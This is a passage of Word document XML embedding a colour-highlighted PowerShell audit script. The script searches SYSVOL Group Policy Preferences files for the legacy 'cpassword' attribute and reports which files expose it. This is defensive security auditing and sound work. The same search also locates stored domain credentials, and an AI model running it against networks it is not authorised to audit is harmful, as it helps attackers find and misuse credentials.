                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -ForegroundColor Cyan</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="660066"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Write-Host</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 Scanning for legacy GPP XML files containing 'cpassword'..."</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -ForegroundColor Cyan</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="880000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t># Target specific GPP XML files known to store credentials</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="666600"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>$TargetFiles</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> = @(</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="008800"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>"Groups.xml"</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"Services.xml"</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"ScheduledTasks.xml"</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"Drives.xml"</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"DataSources.xml"</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"Printers.xml"</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="666600"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>$VulnerabilitiesFound</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="006666"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000088"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>foreach</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="666600"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>$File</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000088"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>in</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="666600"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>$TargetFiles</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>) {</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000088"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="660066"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Test-Path</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="666600"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>$SysvolPath</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>) {</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="880000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t># Recursively search for the target XML files</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="666600"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>$FoundFiles</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="660066"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Get-ChildItem</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -Path </w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="666600"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>$SysvolPath</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -Filter </w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="666600"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>$File</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -Recurse -ErrorAction SilentlyContinue</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000088"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>foreach</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="666600"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>$Item</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000088"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>in</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="666600"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>$FoundFiles</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>) {</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="880000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t># Check the contents of the file for the cpassword attribute</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="666600"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>$Content</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="660066"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Get-Content</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -Path </w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="666600"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>$Item</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.FullName -Raw -ErrorAction SilentlyContinue</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000088"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="666600"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>$Content</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -match </w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="008800"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>'cpassword="[^"]+"'</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>) {</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">                </w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="660066"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Write-Host</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 VULNERABILITY FOUND: Exposed 'cpassword' detected!"</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -ForegroundColor Red</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">                </w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="660066"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Write-Host</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    File Path: $(</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="666600"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>$Item</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="008800"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.FullName)"</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -ForegroundColor Yellow</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">                </w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="666600"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>$VulnerabilitiesFound</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>++</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">            }</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        }</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>}</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000088"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="666600"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>$VulnerabilitiesFound</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -eq </w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="006666"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>) {</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="660066"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Write-Host</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 Scan complete. No legacy 'cpassword' attributes detected in SYSVOL."</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
